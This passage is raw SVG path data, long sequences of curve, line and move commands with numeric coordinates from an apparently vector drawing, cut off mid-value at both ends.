1112.1898,332.50196 1112.566,331.89324 C 1113.0528,331.10559 1113.4701,331.14253 1114.0132,332.02135 C 1114.9419,333.52397 1117,332.43497 1117,330.44098 C 1117,329.64844 1117.675,329 1118.5,329 C 1119.325,329 1120,328.60175 1120,328.11501 C 1120,326.90871 1115.4303,324 1113.5352,324 C 1112.6908,324 1112,323.55 1112,323 C 1112,321.71745 1112.1131,321.72901 1116.1279,323.42201 C 1120.7711,325.38005 1124.0669,328.66214 1123.3267,330.591 C 1122.8392,331.86155 1122.5575,331.9087 1121.8761,330.83385 C 1121.2431,329.83513 1121.0268,329.81406 1121.0153,330.75 C 1120.988,332.98326 1120.6282,333.47983 1118.0451,334.84957 C 1114.8259,336.55661 1109,337.18026 1109,335.81782 C 1109,335.25033 1109.7108,335.05877 1110.5795,335.39212 C 1112.5119,336.13368 1117,335.10672 1117,333.92298 C 1117,333.44986 1116.4375,333.25823 1115.75,333.49713 C 1115.0625,333.73602 1112.475,334.1034 1110,334.31353 C 1106.5924,334.60282 1105.4979,335.10684 1105.4913,336.38966 C 1105.4864,337.32141 1104.8663,338.4646 1104.1131,338.93007 C 1102.5291,339.90909 1103.4679,342 1105.4916,342 C 1106.2471,342 1107.1509,342.9 1107.5,344 C 1107.8491,345.1 1108.7795,346 1109.5674,346 C 1110.3553,346 1111,346.34175 1111,346.75945 C 1111,347.17715 1112.0125,348.14945 1113.25,348.92011 C 1115.3196,350.20895 1115.3883,350.18621 1114.1075,348.63649 C 1112.1082,346.21752 1113.2943,345.65335 1115.8036,347.8297 C 1117.4193,349.23097 1117.6492,349.95076 1116.764,350.83604 C 1115.5961,352.00387 1112.742,352.40866 1111.8643,351.53094 z M 1106.0961,344.2849 C 1100.5894,338.70824 1100.54,338.60658 1103,337.92434 C 1105.3891,337.26178 1105.3152,337.1541 1101.3358,335.49751 C 1099.0455,334.54408 1096.9501,332.9172 1096.6794,331.88221 C 1096.2488,330.23556 1084.2817,323.83511 1082.1965,324.13625 C 1081.8134,324.19158 1081.275,324.14912 1081,324.04191 C 1080.725,323.9347 1079.6187,323.68246 1078.5416,323.48139 C 1077.4645,323.28031 1074.9437,322.37651 1072.94,321.47294 L 1069.2968,319.83008 L 1065.3984,323.41026 C 1061.1541,327.30815 1059.5254,327.81161 1058.6384,325.5 C 1057.946,323.69557 1055.8949,323.47668 1056.25,325.24511 C 1056.6028,327.00222 1061.0504,329.63905 1065.0833,330.4821 C 1068.8066,331.26041 1073.0609,333.60461 1072.8633,334.76892 C 1072.6256,336.16848 1075.4448,342 1076.359,342 C 1076.8653,342 1077.8831,342.7875 1078.6208,343.75 C 1079.7933,345.27995 1080.0882,345.31138 1080.9657,344 C 1081.8401,342.69322 1081.9713,342.71041 1081.9847,344.13342 C 1082.0021,345.99157 1086.1763,347.14642 1088.1854,345.84894 C 1089.1648,345.2164 1088.9264,344.84275 1087.25,344.38334 C 1086.0125,344.04421 1085,343.38334 1085,342.91475 C 1085,342.44616 1085.7401,342.34676 1086.6446,342.69386 C 1087.5553,343.04331 1088.7841,342.6946 1089.3982,341.91248 C 1091.8476,338.79287 1096.1886,340.10497 1101.5374,345.58161 C 1104.746,348.86682 1105.8934,349.4722 1109.4734,349.76849 C 1111.2967,349.91939 1110.6948,348.94196 1106.0961,344.2849 z M 1080.7415,339.75 C 1080.4801,338.5125 1080.5912,334.8 1080.9885,331.5 C 1081.7101,325.50514 1081.7107,325.50707 1081.7034,333.75 C 1081.6994,338.2875 1081.5882,342 1081.4564,342 C 1081.3246,342 1081.0029,340.9875 1080.7415,339.75 z M 1073.5,342 C 1073.8399,341.45 1073.4165,341 1072.559,341 C 1071.7016,341 1071,341.45 1071,342 C 1071,343.29391 1072.7003,343.29391 1073.5,342 z M 1054.9847,324.85699 C 1054.9931,324.50333 1054.3953,323.98192 1053.6561,323.69828 C 1052.6845,323.32543 1052.4447,323.87521 1052.7903,325.68325 C 1053.1413,327.51963 1053.4942,327.82743 1054.1188,326.84195 C 1054.5866,326.10388 1054.9763,325.21064 1054.9847,324.85699 z M 1055.9121,320.60595 C 1056.8053,319.52962 1056.703,318.84587 1055.4631,317.60595 C 1053.4635,315.60639 1050.9674,315.55743 1048.4411,317.4682 C 1046.6847,318.79667 1046.6665,318.93942 1048.25,318.9682 C 1049.2125,318.98569 1050,319.675 1050,320.5 C 1050,322.419 1054.3428,322.49683 1055.9121,320.60595 z M 1147.75,349.25399 C 1146.7875,349.03364 1146,348.25348 1146,347.5203 C 1146,346.64705 1146.7443,346.38189 1148.1579,346.75155 C 1149.9782,347.22757 1150.2276,346.97824 1149.7516,345.15793 C 1149.4412,343.97107 1149.5686,343 1150.0346,343 C 1151.7013,343 1152.1486,345.11767 1150.8361,346.7938 C 1149.6616,348.29363 1149.6926,348.34986 1151.092,347.25868 C 1152.6774,346.02253 1154,346.48416 1154,348.27366 C 1154,348.79083 1153.3798,348.976 1152.6219,348.68513 C 1151.8639,348.39427 1150.8514,348.49342 1150.3719,348.90546 C 1149.8923,349.3175 1148.7125,349.47434 1147.75,349.25399 z M 1121,346 C 1121,344.70609 1122.7003,344.70609 1123.5,346 C 1123.8399,346.55 1123.4165,347 1122.559,347 C 1121.7016,347 1121,346.55 1121,346 z M 1137.7495,343.61725 C 1135.1041,341.50788 1133.8388,339.1643 1136.0998,340.56166 C 1136.8727,341.03937 1136.8623,340.61115 1136.0646,339.12068 C 1134.6296,336.43944 1136.1161,336.36578 1138.5,339 C 1139.7006,340.32667 1139.8838,341 1139.0442,341 C 1138.348,341 1138.8013,341.8283 1140.0515,342.84066 C 1141.3018,343.85302 1141.9139,344.93518 1141.4118,345.24547 C 1140.9098,345.55576 1139.2617,344.82306 1137.7495,343.61725 z M 1144.75,343.42803 C 1143.2375,342.60748 1142,341.52143 1142,341.01457 C 1142,340.50772 1143.3472,340.85959 1144.9937,341.79651 C 1146.6402,342.73343 1147.9902,343.8375 1147.9937,344.25 C 1148.0017,345.19988 1148.0286,345.20671 1144.75,343.42803 z M 1046.1545,341.44803 C 1046.3445,340.46777 1047.1055,339.46412 1047.8455,339.2177 C 1048.7061,338.93112 1049.0665,339.41195 1048.8455,340.55197 C 1048.6555,341.53223 1047.8945,342.53588 1047.1545,342.7823 C 1046.2939,343.06888 1045.9335,342.58805 1046.1545,341.44803 z M 1056,337.12244 C 1056,336.08979 1056.6697,334.68911 1057.4882,334.00982 C 1058.694,333.00908 1059.0947,333.08313 1059.6,334.40011 C 1060.2323,336.04778 1058.485,339 1056.8776,339 C 1056.3949,339 1056,338.1551 1056,337.12244 z M 1132.4929,338.01145 C 1132.8289,337.46775 1132.4857,337.26014 1131.7301,337.55009 C 1130.9101,337.86474 1129.8813,337.03484 1129.1781,335.49158 C 1127.5218,331.85639 1127.6682,330.47978 1129.5455,332.03777 C 1130.3955,332.74323 1130.8617,333.91793 1130.5815,334.64822 C 1130.3013,335.3785 1130.3933,335.92812 1130.786,335.86958 C 1132.8319,335.56463 1134,336.15718 1134,337.5 C 1134,338.325 1133.5234,339 1132.941,339 C 1132.3585,339 1132.1569,338.55515 1132.4929,338.01145 z M 1008.3693,335.75 C 1007.9482,334.5125 1007.7534,333.05 1007.9364,332.5 C 1008.1194,331.95 1008.1881,329.77571 1008.0892,327.66824 C 1007.9436,324.56591 1008.2987,323.73465 1009.9547,323.3016 C 1012.5615,322.61989 1012.5083,322.01459 1009.5992,319.25717 C 1007.5145,317.28114 1007.0832,317.1948 1005.974,318.53133 C 1005.2815,319.36568 1004.9883,320.32162 1005.3223,320.65565 C 1005.6563,320.98967 1005.449,322.16103 1004.8616,323.25866 C 1004.0784,324.72202 1004.1138,325.45232 1004.9944,325.99653 C 1006.2949,326.80028 1006.9831,335.00116 1005.75,335.00044 C 1005.3375,335.0002 1005,333.2375 1005,331.08333 C 1005,328.92917 1004.4732,326.99107 1003.8293,326.77645 C 1002.9418,326.48061 1002.9596,325.31154 1003.9027,321.94311 C 1004.5868,319.4994 1005.399,316.375 1005.7075,315 C 1006.5512,311.23965 1008.0022,309.75693 1009.5674,311.0559 C 1010.2835,311.65021 1012.3612,311.95277 1014.1847,311.72827 L 1017.5,311.32007 L 1013.75,311.16004 C 1011.6875,311.07202 1010,310.5798 1010,310.06622 C 1010,309.18679 1010.9072,309.23456 1018.6115,310.51965 C 1020.6894,310.86625 1022.1419,310.53393 1022.984,309.51933 C 1023.6775,308.6837 1024.6398,308 1025.1224,308 C 1026.6115,308 1026.0958,309.90418 1024.0537,311.94632 C 1022.3616,313.63843 1021.1861,313.8154 1015.0537,313.30128 C 1008.8254,312.77912 1008,312.91078 1008,314.42639 C 1008,315.37045 1008.6468,316.78961 1009.4372,317.58009 C 1010.6869,318.82973 1011.092,318.72251 1012.5409,316.75866 C 1013.4795,315.4866 1014.3958,314.98252 1014.6386,315.60466 C 1014.8757,316.21222 1016.1791,316.49726 1017.5349,316.23808 C 1019.509,315.86071 1020,316.17667 1020,317.82441 C 1020,320.53724 1018.5339,321.34825 1016.9909,319.48899 C 1015.5709,317.77799 1012,317.47635 1012,319.06739 C 1012,319.67302 1012.9734,319.89332 1014.25,319.57662 C 1015.4875,319.26963 1015.9375,319.27681 1015.25,319.59256 C 1013.5753,320.36172 1013.6679,322.4795 1015.4406,323.95067 C 1016.2329,324.60823 1016.6347,325.78833 1016.3336,326.57311 C 1015.9993,327.44416 1016.412,328 1017.393,328 C 1019.1424,328 1019.5772,331.54077 1018.1119,333.85325 C 1016.8735,335.80751 1013.1959,333.62862 1012.4034,330.47114 C 1012.0623,329.11201 1011.3338,328 1010.7846,328 C 1010.2354,328 1010.0395,327.33941 1010.3493,326.53203 C 1010.6592,325.72464 1010.4361,324.7695 1009.8536,324.40949 C 1009.1263,323.96001 1008.9748,325.98652 1009.37,330.87747 C 1009.9659,338.25157 1009.6853,339.61797 1008.3693,335.75 z M 1016.3379,330.75 C 1015.9089,330.0625 1015.4271,328.6 1015.2673,327.5 C 1014.82,324.42134 1014.1506,323 1013.148,323 C 1011.5935,323 1011.0373,327.07708 1012.5145,327.64393 C 1013.2775,327.93673 1013.6076,328.85912 1013.2669,329.7468 C 1012.8828,330.74775 1013.0641,331.0784 1013.761,330.64773 C 1014.3664,330.27354 1015.1445,330.42472 1015.4899,330.98369 C 1015.8354,331.54266 1016.343,332 1016.618,332 C 1016.893,332 1016.767,331.4375 1016.3379,330.75 z M 1022.3455,312.25 C 1022.6004,311.8375 1021.77,311.5 1020.5,311.5 C 1019.23,311.5 1018.3996,311.8375 1018.6545,312.25 C 1019.2541,313.22023 1021.7459,313.22023 1022.3455,312.25 z M 1052.0153,335.30902 C 1052.0237,334.86406 1052.4668,333.825 1053,333 C 1053.8354,331.70731 1053.9715,331.73371 1053.9847,333.19098 C 1053.9931,334.12102 1053.55,335.16008 1053,335.5 C 1052.45,335.83992 1052.0069,335.75398 1052.0153,335.30902 z M 988,328.7154 C 988,326.99059 984.74962,325.96383 980.72568,326.41752 C 979.1998,326.58956 977.72289,326.36065 977.44365,325.90883 C 977.16442,325.45702 976.34746,325.31317 975.62819,325.58918 C 974.07712,326.18438 972.32675,324.29243 971.84502,321.5 C 971.65526,320.4 970.92793,319.04904 970.22872,318.49786 C 968.63337,317.24025 967.70031,312.33019 968.47223,309.25462 C 968.98354,307.21741 969.48224,306.99984 972.39014,307.54537 C 975.16197,308.06537 975.80917,307.83772 976.23971,306.19134 C 976.55046,305.00302 977.95752,303.9486 979.76113,303.55246 C 981.41326,303.1896 983.87139,301.67934 985.22363,300.19635 C 986.57588,298.71336 988.7974,296.6 990.16036,295.5 C 991.52332,294.4 993.39481,292.38737 994.31923,291.02749 C 995.24366,289.66762 996.00689,288.99262 996.01531,289.52749 C 996.02373,290.06237 996.46684,289.825 997,289 C 997.77093,287.80707 997.97251,287.78325 997.98469,288.88365 C 998.00004,290.27078 1002.8418,294.99649 1004.25,294.99878 C 1005.8048,295.00131 1004.9009,296.92404 1002.1039,299.56396 C 999.49044,302.03061 999.31092,302.60018 1000.2648,305.39872 C 1000.8462,307.10442 1001.9244,308.85986 1002.6609,309.29969 C 1004.6851,310.50852 1004.2696,311.82261 1001.75,312.18045 C 1000.2171,312.39815 999.46361,313.22187 999.38582,314.76491 C 999.32302,316.01061 998.34551,317.83304 997.21358,318.81477 C 996.08164,319.79649 995.19141,321.25228 995.23529,322.04986 C 995.49902,326.84357 994.90289,328.87174 993.25,328.80433 C 992.2875,328.76508 990.7125,329.06619 989.75,329.47347 C 988.53242,329.98869 988,329.75805 988,328.7154 z M 993.43364,324.40838 C 993.79867,322.95397 993.85843,321.52509 993.56643,321.23309 C 993.27442,320.94109 994.10555,319.75669 995.41337,318.60109 C 996.72119,317.44549 998.08827,315.08618 998.45131,313.35818 C 998.993,310.77986 999.50494,310.29898 1001.3057,310.67699 C 1003.2259,311.08007 1003.2854,311.00012 1001.7818,310.0369 C 999.59202,308.63412 996.61528,302.43151 997.46893,301.05027 C 997.86911,300.40277 996.92812,300 995.01518,300 C 992.96413,300 992.01193,300.44722 992.20616,301.31932 C 992.65688,303.34303 988.74015,309.98583 987.0226,310.11069 C 986.18517,310.17157 984.49504,310.14035 983.26675,310.04132 C 982.03847,309.94229 980.46347,310.22169 979.76675,310.66221 C 977.64126,312.00613 973.11606,311.84477 971.90187,310.38176 C 971.27115,309.62179 970.30396,309 969.75256,309 C 968.35707,309 969.6694,314.97721 971.51188,317.01312 C 972.33034,317.91752 973,319.54455 973,320.62874 C 973,323.09068 974.82495,325.00441 976.54371,324.34485 C 977.25872,324.07048 978.74258,324.32705 979.84119,324.91501 C 981.32622,325.70977 981.95556,325.66539 982.29433,324.74201 C 982.64331,323.79079 983.04192,323.77436 983.99686,324.67186 C 984.68263,325.31638 985.89072,325.59543 986.68151,325.29197 C 987.57936,324.94744 988.32613,325.53112 988.67004,326.84623 C 989.40939,329.67351 992.5105,328.08647 993.43364,324.40838 z M 975.3717,310.20759 C 975.64106,309.77176 974.98289,309.34899 973.90911,309.26811 C 972.83532,309.18722 972.21806,309.54381 972.5374,310.06052 C 973.24596,311.207 974.70718,311.28281 975.3717,310.20759 z M 988.54413,307.31609 C 989.29283,306.31724 990.19412,304.23209 990.547,302.68243 C 991.25371,299.57887 991.86849,299.20097 997,298.71579 C 998.925,298.53378 1001.4,297.87137 1002.5,297.24378 C 1004.3808,296.17068 1004.3064,296.03423 1001.25,294.95352 C 999.4625,294.32148 998,293.39837 998,292.90217 C 998,292.40598 997.1,292 996,292 C 994.88889,292 994,292.66667 994,293.5 C 994,294.325 993.59878,295 993.10841,295 C 992.61803,295 991.92419,296.16591 991.56654,297.59092 C 991.13923,299.29344 990.42556,299.99355 989.48521,299.6327 C 988.69813,299.33067 986.73951,300.18975 985.13272,301.54178 C 983.52593,302.8938 981.74589,304 981.17707,304 C 979.7491,304 977,306.87701 977,308.37141 C 977,310.41421 986.90029,309.50916 988.54413,307.31609 z M 1028.7012,327.3679 C 1027.2951,325.96173 1028.0595,325 1030.5833,325 C 1032.2053,325 1033.0118,325.46517 1032.7505,326.25 C 1032.2691,327.69569 1029.73,328.39668 1028.7012,327.3679 z M 1031.1875,326.31689 C 1030.4656,326.02802 1029.6031,326.06354 1029.2708,326.39583 C 1028.9385,326.72812 1029.5292,326.96447 1030.5833,326.92105 C 1031.7483,326.87307 1031.9852,326.63611 1031.1875,326.31689 z M 1034.6732,326.59065 C 1033.8809,324.52616 1034.8702,324 1039.5442,324 C 1042.097,324 1044.2532,324.60018 1045.0201,325.52417 C 1046.6709,327.51331 1045.6511,328.4747 1043.325,327.12207 C 1042.0623,326.38782 1041.9365,326.05145 1042.9167,326.03041 C 1043.6958,326.01368 1044.0442,325.71087 1043.6908,325.3575 C 1043.3375,325.00412 1042.475,325.16707 1041.7742,325.71961 C 1039.4188,327.57668 1035.2479,328.08831 1034.6732,326.59065 z M 938.07895,326.2587 C 938.03553,325.57598 936.71085,323.77598 935.13521,322.2587 C 933.55958,320.74141 931.9381,318.375 931.53193,317 L 930.79343,314.5 L 932.64672,316.83977 C 933.66602,318.12665 935.55071,320.48702 936.83491,322.08504 C 938.11911,323.68306 938.94214,325.55516 938.66386,326.24527 C 938.26681,327.2299 938.1409,327.23279 938.07895,326.2587 z M 963,324.5 C 963,323.47004 963.6554,322.97957 964.75,323.19037 C 967.01315,323.62621 967.01315,325.37379 964.75,325.80963 C 963.6554,326.02043 963,325.52996 963,324.5 z M 1027.5,323 C 1027.1601,322.45 1025.7835,322 1024.441,322 C 1023.0984,322 1022,321.55 1022,321 C 1022,320.45 1023.7579,320 1025.9064,320 C 1029.3204,320 1029.7468,320.25206 1029.2897,322 C 1028.6995,324.25708 1028.3854,324.43259 1027.5,323 z M 1100,322 C 1100,321.45 1100.9266,321 1102.059,321 C 1103.1915,321 1103.8399,321.45 1103.5,322 C 1102.6976,323.29836 1100,323.29836 1100,322 z M 1041.5,321 C 1041.1601,320.45 1041.8085,320 1042.941,320 C 1044.0734,320 1045,320.45 1045,321 C 1045,322.29836 1042.3024,322.29836 1041.5,321 z M 1033,320 C 1033,318.70164 1035.6976,318.70164 1036.5,320 C 1036.8399,320.55 1036.1915,321 1035.059,321 C 1033.9266,321 1033,320.55 1033,320 z M 265.25,318.28172 C 263.84614,317.77814 263.54789,314.39745 264.83703,313.60072 C 265.90893,312.93825 270,315.77375 270,317.17915 C 270,317.88373 269.52185,317.84806 268.58903,317.07389 C 267.50861,316.17722 267.00386,316.18473 266.43452,317.10595 C 265.96314,317.86866 266.11356,318.04785 266.84549,317.59549 C 267.48047,317.20305 268,317.10697 268,317.38197 C 268,318.26503 266.53746,318.74355 265.25,318.28172 z M 1062.029,318.03906 C 1061.2199,317.52739 1060.8931,316.77356 1061.3028,316.3639 C 1061.7124,315.95423 1062.8083,316.37976 1063.7381,317.30952 C 1065.5455,319.11691 1064.4635,319.57873 1062.029,318.03906 z M 271,317.55902 C 271,317.31648 271.45,316.83992 272,316.5 C 272.55,316.16008 273,316.35852 273,316.94098 C 273,317.52344 272.55,318 272,318 C 271.45,318 271,317.80156 271,317.55902 z M 1032.3168,316.70361 C 1031.9478,316.10654 1032.143,315.45235 1032.7505,315.24984 C 1033.4026,315.03248 1033.6422,313.56977 1033.3354,311.67921 C 1032.9428,309.25988 1033.3288,308.01243 1034.914,306.57785 C 1037.3004,304.4182 1038.9526,305.14722 1037.0011,307.49873 C 1035.911,308.81222 1035.9825,308.94395 1037.4749,308.37126 C 1038.9739,307.79605 1039.0752,307.99097 1038.1631,309.69517 C 1037.3891,311.14144 1037.4122,312.01224 1038.2468,312.8468 C 1039.7118,314.31182 1038.486,314.33047 1035.7838,312.88427 L 1033.699,311.76854 L 1035.7392,314.63427 L 1037.7793,317.5 L 1035.3835,317.64459 C 1034.0658,317.72412 1032.6858,317.30068 1032.3168,316.70361 z M 608.54271,314.0691 C 608.22627,313.5571 608.42472,312.85554 608.98369,312.51008 C 609.54266,312.16462 610,312.58352 610,313.44098 C 610,315.19751 609.39994,315.45614 608.54271,314.0691 z M 927.78167,311.05797 C 926.84514,309.96419 926.46015,308.83364 926.92614,308.54565 C 928.00802,307.87701 930.30262,310.59215 929.83676,311.98971 C 929.64299,312.57104 928.71819,312.15176 927.78167,311.05797 z M 33.5,308 C 33.160081,307.45 33.358524,307 33.940983,307 C 34.523442,307 35,307.45 35,308 C 35,309.28138 34.291939,309.28138 33.5,308 z M 923,306 C 922.20686,305.50981 921.88989,304.77678 922.29563,304.37104 C 922.70137,303.9653 923.55833,304.15833 924.2,304.8 C 925.71091,306.31091 924.86759,307.15423 923,306 z M 1026,302 C 1026,301.45 1026.45,301 1027,301 C 1027.55,301 1028,301.45 1028,302 C 1028,302.55 1027.55,303 1027,303 C 1026.45,303 1026,302.55 1026,302 z M 965,301.05902 C 965,300.54148 965.45,299.83992 966,299.5 C 966.55,299.16008 967,299.58352 967,300.44098 C 967,301.29844 966.55,302 966,302 C 965.45,302 965,301.57656 965,301.05902 z M 1030,300.05902 C 1030,299.54148 1030.45,298.83992 1031,298.5 C 1031.55,298.16008 1032,298.58352 1032,299.44098 C 1032,300.29844 1031.55,301 1031,301 C 1030.45,301 1030,300.57656 1030,300.05902 z M 1006.5,296 C 1007.2997,294.70609 1009,294.70609 1009,296 C 1009,296.55 1008.2984,297 1007.441,297 C 1006.5835,297 1006.1601,296.55 1006.5,296 z M 1023.25,293.32558 C 1021.052,291.7923 1019.8845,286.19253 1022.0407,287.52514 C 1022.613,287.87889 1022.8316,288.95527 1022.5263,289.9171 C 1022.1407,291.13204 1022.7604,292.02545 1024.5565,292.84377 C 1026.9235,293.92226 1027.088,293.85272 1026.5063,292.01978 C 1025.5879,289.1263 1026.8093,287.60063 1028.7624,289.20144 C 1030.1538,290.34181 1030.2592,290.19545 1029.6278,288 C 1028.4731,283.98501 1028.2166,281 1029.0262,281 C 1030.1755,281 1031.1494,287.55664 1030.4274,290.43321 C 1030.075,291.83734 1029.4318,292.76687 1028.9981,292.49883 C 1028.5644,292.23079 1027.9515,292.6839 1027.6362,293.50574 C 1026.9258,295.35699 1026.1144,295.32366 1023.25,293.32558 z M 1010.2708,293.39583 C 1010.6031,293.06354 1011.4656,293.02802 1012.1875,293.31689 C 1012.9852,293.63611 1012.7483,293.87307 1011.5833,293.92105 C 1010.5292,293.96447 1009.9385,293.72812 1010.2708,293.39583 z M 1013.5188,289.75 C 1014.4288,286.61713 1019.0954,282.83432 1020.5555,284.04602 C 1021.3145,284.67598 1022.4867,284.31247 1024.0397,282.96553 L 1026.3802,280.93571 L 1024.0525,278.71785 C 1022.7722,277.49803 1022.0145,277.02407 1022.3686,277.66459 C 1022.7227,278.30511 1022.6722,279.01886 1022.2562,279.25069 C 1021.8403,279.48253 1022.0625,279.53509 1022.75,279.36749 C 1023.4375,279.19989 1024,279.49865 1024,280.03138 C 1024,280.56412 1023.19,281 1022.2,281 C 1021.21,281 1019.8791,281.52093 1019.2424,282.15762 C 1018.3656,283.03444 1017.7106,283.00474 1016.5424,282.03517 C 1014.7639,280.55917 1014.5156,279 1016.059,279 C 1016.6415,279 1016.8399,279.45 1016.5,280 C 1016.1601,280.55 1016.3585,281 1016.941,281 C 1018.819,281 1018.0656,278.82991 1016,278.28975 C 1014.0557,277.7813 1013.5686,276.10535 1013.9587,271.26675 C 1014.1947,268.33901 1013.2736,266.95776 1011.5311,267.62643 C 1010.7247,267.93588 1010.3869,268.84459 1010.738,269.75964 C 1011.2627,271.12699 1011.4571,271.07965 1012.1046,269.42689 C 1012.7959,267.66204 1012.8653,267.68922 1012.9297,269.75 C 1012.9684,270.9875 1012.6018,272 1012.115,272 C 1010.8411,272 1007.8162,267.10635 1008.4531,266.07583 C 1008.7481,265.59861 1008.3195,263.92382 1007.5009,262.35408 C 1005.6171,258.74219 1005.6189,257.23826 1007.5092,255.34795 C 1008.3392,254.5179 1008.7684,253.43434 1008.4629,252.94005 C 1008.1575,252.44575 1008.374,251.16978 1008.944,250.10455 C 1009.7698,248.56168 1010.5418,248.32631 1012.7403,248.94726 C 1014.2581,249.37598 1015.3717,250.2856 1015.2149,250.96863 C 1015.0581,251.65167 1015.4376,252.82229 1016.0581,253.57001 C 1016.9208,254.60954 1016.6777,255.64387 1015.0251,257.96475 C 1013.8364,259.63414 1013.3445,261 1013.9319,261 C 1014.5194,261 1015,261.675 1015,262.5 C 1015,263.84976 1017.2382,264.43621 1021.75,264.26865 C 1023.375,264.2083 1023.375,266.68204 1021.75,267.33772 C 1020.7887,267.72563 1020.8023,267.86034 1021.809,267.92105 C 1022.529,267.96447 1022.8399,268.45 1022.5,269 C 1022.1495,269.56716 1022.9896,270 1024.441,270 C 1025.9834,270 1027,270.5634 1027,271.41821 C 1027,272.19823 1027.2731,273.54823 1027.607,274.41821 C 1028.0108,275.47052 1027.6563,276 1026.548,276 C 1025.6317,276 1025.1646,276.45734 1025.5101,277.01631 C 1025.8555,277.57528 1026.5571,277.77373 1027.0691,277.45729 C 1029.2327,276.12011 1027.7762,281.29133 1025.3864,283.43182 C 1019.7318,288.49633 1018.8693,289.0614 1017.2143,288.78565 C 1016.1021,288.60032 1015.5488,289.11461 1015.6389,290.25 C 1015.7153,291.2125 1015.1225,292 1014.3215,292 C 1013.2843,292 1013.0533,291.35251 1013.5188,289.75 z M 1019.5,286 C 1020.2822,284.7344 1018.9584,284.7344 1017,286 C 1015.7073,286.8354 1015.7337,286.97149 1017.191,286.98469 C 1018.121,286.99311 1019.1601,286.55 1019.5,286 z M 1020.1157,272.71573 C 1019.2948,271.89476 1019,272.0275 1019,273.21821 C 1019,274.10823 1018.7196,275.66073 1018.377,276.66821 C 1017.9346,277.96878 1018.2582,277.82306 1019.4927,276.16573 C 1020.7721,274.44813 1020.9367,273.5367 1020.1157,272.71573 z M 1016.3616,275.5 C 1016.6782,274.675 1016.5014,274 1015.9686,274 C 1015.4359,274 1015,274.675 1015,275.5 C 1015,277.42067 1015.6246,277.42067 1016.3616,275.5 z M 1018.2672,271.08625 C 1018.6062,269.78989 1018.1599,269.01357 1016.8838,268.67987 C 1015.8477,268.40892 1015,268.59511 1015,269.09362 C 1015,269.59213 1015.45,270 1016,270 C 1016.55,270 1017,270.47656 1017,271.05902 C 1017,271.64148 1016.55,271.83992 1016,271.5 C 1015.45,271.16008 1015,271.35852 1015,271.94098 C 1015,273.7961 1017.7464,273.0776 1018.2672,271.08625 z M 1025.1491,271.74908 C 1024.3923,270.99226 1023.6627,270.9373 1023.0119,271.58809 C 1022.3611,272.23888 1022.7534,272.63114 1024.161,272.73717 C 1025.7706,272.85842 1026.0145,272.61452 1025.1491,271.74908 z M 1017.6667,266.54399 C 1017.6667,265.74318 1017.2843,265.32428 1016.817,265.61309 C 1016.3497,265.9019 1016.2263,266.5571 1016.5427,267.0691 C 1017.3513,268.37748 1017.6667,268.23016 1017.6667,266.54399 z M 1012.629,262.68918 C 1012.3291,261.54237 1012.6274,259.93177 1013.2919,259.11008 C 1014.2773,257.8915 1014.2235,257.75218 1013,258.35435 C 1012.175,258.7604 1012.5,258.35021 1013.7222,257.44282 C 1015.822,255.88383 1015.8601,255.63017 1014.4143,252.83432 C 1012.6765,249.47375 1009.5616,249.31752 1009.3952,252.5826 C 1009.3376,253.7133 1008.9797,256.29477 1008.5999,258.31921 C 1008.0306,261.35376 1008.1995,262 1009.5617,262 C 1010.5683,262 1011.0037,262.54792 1010.6759,263.40223 C 1010.0325,265.079 1010.903,266.178 1012.2266,265.35995 C 1012.7478,265.03783 1012.9289,263.83598 1012.629,262.68918 z M 997,285.2274 C 997,284.66779 998.1449,283.15019 999.54422,281.85496 C 1000.9435,280.55973 1002.795,278.18536 1003.6585,276.57859 C 1005.0348,274.01783 1005.3463,273.8675 1006.1821,275.36085 C 1006.9222,276.6834 1006.3933,277.78489 1003.8177,280.2847 C 999.06931,284.89351 997,286.39372 997,285.2274 z M 910,277 C 910,276.45 910.45,276 911,276 C 911.55,276 912,276.45 912,277 C 912,277.55 911.55,278 911,278 C 910.45,278 910,277.55 910,277 z M 910.70217,274.32712 C 910.35722,273.76897 910.60329,271.55454 911.24901,269.40615 C 912.28925,265.94511 912.46115,265.78927 912.75753,268.0385 C 913.15359,271.0442 911.6038,275.78598 910.70217,274.32712 z M 1006.6395,273.30615 C 1005.5133,272.17996 1005.9536,271 1007.5,271 C 1008.325,271 1009,271.42344 1009,271.94098 C 1009,273.20196 1007.4384,274.10508 1006.6395,273.30615 z M 773.66667,271.33333 C 772.3691,270.03577 773.02842,269.27605 775.25,269.50891 C 778.54631,269.85443 778.64394,269.93761 777,271 C 775.21113,272.15606 774.555,272.22167 773.66667,271.33333 z M 376,268 C 376,266.71862 376.70806,266.71862 377.5,268 C 377.83992,268.55 377.64148,269 377.05902,269 C 376.47656,269 376,268.55 376,268 z M 1093,267.55902 C 1093,267.31648 1093.45,266.83992 1094,266.5 C 1094.55,266.16008 1095,266.35852 1095,266.94098 C 1095,267.52344 1094.55,268 1094,268 C 1093.45,268 1093,267.80156 1093,267.55902 z M 372.01118,266.75 C 371.86753,266.3375 371.67456,265.6625 371.58235,265.25 C 371.49015,264.8375 370.82655,262.78235 370.10769,260.683 C 368.80676,256.88377 369.04987,255.29475 370.76947,256.35752 C 371.26586,256.66431 371.58899,257.94687 371.48754,259.20766 C 371.38609,260.46845 371.72426,261.77589 372.23903,262.11309 C 372.75381,262.45029 372.97189,263.80029 372.72367,265.11309 C 372.47545,266.42589 372.15483,267.1625 372.01118,266.75 z M 502.66667,262.33333 C 502.3,261.96667 502,261.20167 502,260.63333 C 502,260.00673 502.46577,260.06577 503.18333,260.78333 C 503.83417,261.43417 504.13417,262.19917 503.85,262.48333 C 503.56583,262.7675 503.03333,262.7 502.66667,262.33333 z M 505,258 C 505,257.45 505.45,257 506,257 C 506.55,257 507,257.45 507,258 C 507,258.55 506.55,259 506,259 C 505.45,259 505,258.55 505,258 z M 497,255.05902 C 497,254.47656 497.45,254 498,254 C 499.28138,254 499.28138,254.70806 498,255.5 C 497.45,255.83992 497,255.64148 497,255.05902 z M 313.23564,251.69194 C 310.29291,250.37886 310.38642,249 313.41821,249 C 316.36427,249 319,249.93985 319,250.99036 C 319,252.32044 315.57765,252.73698 313.23564,251.69194 z M 316.25,250.33772 C 315.5625,250.06031 314.4375,250.06031 313.75,250.33772 C 313.0625,250.61513 313.625,250.84211 315,250.84211 C 316.375,250.84211 316.9375,250.61513 316.25,250.33772 z M 334,251.86833 C 334,251.12716 332.63324,250.91998 330.03912,251.26793 C 327.51273,251.60679 325.70504,251.34953 325.04779,250.55759 C 323.95206,249.23731 324.62368,247.98997 326.41667,248.01531 C 327.0125,248.02373 326.825,248.46684 326,249 C 325.175,249.53316 324.95,249.96937 325.5,249.96937 C 326.83748,249.96937 329.77786,248.03914 328.5,248 C 